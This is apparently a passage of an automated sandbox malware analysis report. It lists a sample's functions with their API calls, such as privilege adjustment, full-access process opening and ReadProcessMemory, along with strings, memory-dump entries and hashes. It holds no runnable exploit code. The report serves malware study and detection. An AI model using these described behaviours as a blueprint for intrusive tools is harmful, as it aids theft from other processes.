                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Locale$InfoThread
                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                  • API String ID: 4232894706-2493093252
                                                                                  • Opcode ID: b16494e469d49e50582bd1e582c42b5fb289f86e543de45ddfe485d1621a4bc5
                                                                                  • Instruction ID: ac9e4f5668c2361f8ded9cb40987799e308fb6d44a5a059f615096ae847b8bc9
                                                                                  • Opcode Fuzzy Hash: b16494e469d49e50582bd1e582c42b5fb289f86e543de45ddfe485d1621a4bc5
                                                                                  • Instruction Fuzzy Hash: AA6133307002499FEF11EBB9E8926DE77BADF89240F50B435E201AB345DA35DD0D9761
                                                                                  Function 6A6DFF30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 157processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DFF7B
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,?,?,00000000,00000220), ref: 6A6DFF8D
                                                                                  • Module32First.KERNEL32 ref: 6A6DFFDC
                                                                                  • Module32Next.KERNEL32(00000000,?), ref: 6A6E0065
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E006F
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000008,?,?,00000000,00000220), ref: 6A6E00AC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandleModule32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                  • String ID: tmp
                                                                                  • API String ID: 2655431330-753892680
                                                                                  • Opcode ID: f5ea16deadec177a84c5573d340a0b2ce2203a0dab7b4ffa5f395380a5553e17
                                                                                  • Instruction ID: 1b437b19c6b5f0cd4e77601cf1e97cf9f110e8e3b35ec491dff07995838290c8
                                                                                  • Opcode Fuzzy Hash: f5ea16deadec177a84c5573d340a0b2ce2203a0dab7b4ffa5f395380a5553e17
                                                                                  • Instruction Fuzzy Hash: 9851E9702092025FE300DBA8DC98F6A73E9FFC5318F068A69D465CB195EF34D50AC751
                                                                                  Function 0BEA2720 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0BEA27B9
                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0BEA27D5
                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0BEA280E
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0BEA289A
                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0BEA28B9
                                                                                  • VariantCopy.OLEAUT32(?), ref: 0BEA28EE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                  • String ID:
                                                                                  • API String ID: 351091851-3916222277
                                                                                  • Opcode ID: 41d3dcf17b7d2dbea94fde99f5d569808b75846182f44e7d2c0927f439d76e54
                                                                                  • Instruction ID: 34d3092894a315c34ee9dfa6f0fa29926d249eebd68fce94daef983892aee7a5
                                                                                  • Opcode Fuzzy Hash: 41d3dcf17b7d2dbea94fde99f5d569808b75846182f44e7d2c0927f439d76e54
                                                                                  • Instruction Fuzzy Hash: EF51EA79A002299FCB66EB58CC81BD9B7FCAF5D204F0051D5EA08AB211D630BF858F65
                                                                                  Function 6A6F1040 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6F0FA0: GetParent.USER32(?), ref: 6A6F0FF4
                                                                                    • Part of subcall function 6A6F0FA0: GetLastActivePopup.USER32(?), ref: 6A6F1005
                                                                                    • Part of subcall function 6A6F0FA0: IsWindowEnabled.USER32(?), ref: 6A6F1019
                                                                                    • Part of subcall function 6A6F0FA0: EnableWindow.USER32(?,00000000), ref: 6A6F102C
                                                                                  • EnableWindow.USER32(?,00000001), ref: 6A6F108D
                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 6A6F10A1
                                                                                  • GetCurrentProcessId.KERNEL32(?,?), ref: 6A6F10AB
                                                                                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 6A6F10C3
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 6A6F113D
                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 6A6F1182
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                  • String ID: 0
                                                                                  • API String ID: 1877664794-4108050209
                                                                                  • Opcode ID: 1ddabbaa034f593c3224723dee085de16ae54378ae0a5efddf034208794fb473
                                                                                  • Instruction ID: 090941163e5a6a626091b76d36fdcfb62d6339246b63dffdd62b658526b1cd59
                                                                                  • Opcode Fuzzy Hash: 1ddabbaa034f593c3224723dee085de16ae54378ae0a5efddf034208794fb473
                                                                                  • Instruction Fuzzy Hash: 7441D4B1A402589BDF21CF65CC46BD9B7BAAB06754F110994FA64E6280DF70DE818FA0
                                                                                  Function 6A6DAAA0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • _memset.LIBCMT ref: 6A6DAAF0
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00680000,?,00040000,?,?,00000000,0003FFFF,6A6DD58A,?), ref: 6A6DAB0D
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6DABC6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead_memset
                                                                                  • String ID: M$P$P$U
                                                                                  • API String ID: 3693474235-3046838568
                                                                                  • Opcode ID: 1008829cb124865e1c15520b0963fadfd1c4dd990daa23e023833a7d6d1b2cfd
                                                                                  • Instruction ID: aa269decd95e81c7646117ba08cf585dfebf398704cee08428f8a369ca429f44
                                                                                  • Opcode Fuzzy Hash: 1008829cb124865e1c15520b0963fadfd1c4dd990daa23e023833a7d6d1b2cfd
                                                                                  • Instruction Fuzzy Hash: 7B313F6200D3C19EC312DB784844A9FBFE45FB6258F480A9DF5E457292D664870DCBAB
                                                                                  Function 6A6D1E60 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1E87
                                                                                  • _strncpy.LIBCMT ref: 6A6D1EA4
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1EB8
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll), ref: 6A6D1ED2
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1ED9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\B2A26198\8C1AXUVPO.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-957995623
                                                                                  • Opcode ID: 500563caf83fa69010cc137430b01feacb1c788d7256e3dbdf0c9bb20ff08aac
                                                                                  • Instruction ID: 794ecca912fc8c597c94911f31c956c78491262c39d17e89a204a2ae4d34411b
                                                                                  • Opcode Fuzzy Hash: 500563caf83fa69010cc137430b01feacb1c788d7256e3dbdf0c9bb20ff08aac
                                                                                  • Instruction Fuzzy Hash: 4F014E7290411167E300EBA48D5CFA73BE54F82784F0A4511FA54D7251DEA1EB0CC3E1
                                                                                  Function 6A6D1EF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1F17
                                                                                  • _strncpy.LIBCMT ref: 6A6D1F34
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1F48
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll), ref: 6A6D1F62
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1F69
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\A806AE3\9683JE76z.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-3795257306
                                                                                  • Opcode ID: 7a5a6f662f98f2ff7731ecaa0c2be80a4acb4a0d7b5f97e52d84882a3ad49a00
                                                                                  • Instruction ID: 8a5cc36b764909ac7f4eb23419e4d3e5d978e17bce8c2bfd7a711c352e2ed9b3
                                                                                  • Opcode Fuzzy Hash: 7a5a6f662f98f2ff7731ecaa0c2be80a4acb4a0d7b5f97e52d84882a3ad49a00
                                                                                  • Instruction Fuzzy Hash: B9012072D0411167F301AB688D48F973BF55F826C4F094911F95497261DFB0EA0CC3E1
                                                                                  Function 6A6D1F80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\CF3651B9$C:\pl.txt
                                                                                  • API String ID: 3727115324-3866704170
                                                                                  • Opcode ID: f70bff1d82c6dd82e17c18da3641c02fd42723a91ebeb6e221c4737e990921d3
                                                                                  • Instruction ID: 8cba4ae1ef712296ccd029ffc3f4bba14ec6b7cbdb5a0f7f36d5cedce6d1a77b
                                                                                  • Opcode Fuzzy Hash: f70bff1d82c6dd82e17c18da3641c02fd42723a91ebeb6e221c4737e990921d3
                                                                                  • Instruction Fuzzy Hash: AE019E7190411167F300DBA48E4CFAB3FE59F82780F0A4455FA40A7219EF60E90CC3D1
                                                                                  Function 6A6D1DD0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D1DF7
                                                                                  • _strncpy.LIBCMT ref: 6A6D1E14
                                                                                  • __wfopen_s.LIBCMT ref: 6A6D1E28
                                                                                  • OutputDebugStringA.KERNEL32(C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll), ref: 6A6D1E42
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1E49
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_memset_strncpy
                                                                                  • String ID: C:\Users\user\Desktop\CFA702\D2EDCA7E\IB88701\B81BTTTQM.dll$C:\pl.txt
                                                                                  • API String ID: 3727115324-3837916900
                                                                                  • Opcode ID: dda03b99b878fad6a4aacf03342c8c070ea27ea43d50e88826ecc3ccc7db0dce
                                                                                  • Instruction ID: 1614ec3f9c701ec46cd30a2e9514f22c7c2196b51a79e5598689a56ded7e2072
                                                                                  • Opcode Fuzzy Hash: dda03b99b878fad6a4aacf03342c8c070ea27ea43d50e88826ecc3ccc7db0dce
                                                                                  • Instruction Fuzzy Hash: 17012B7360822167F300D7A8CD48FAB7BE54FC1784F0A4510FA84A7251DEA0EA4DC3E1
                                                                                  Function 6A6D1610 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
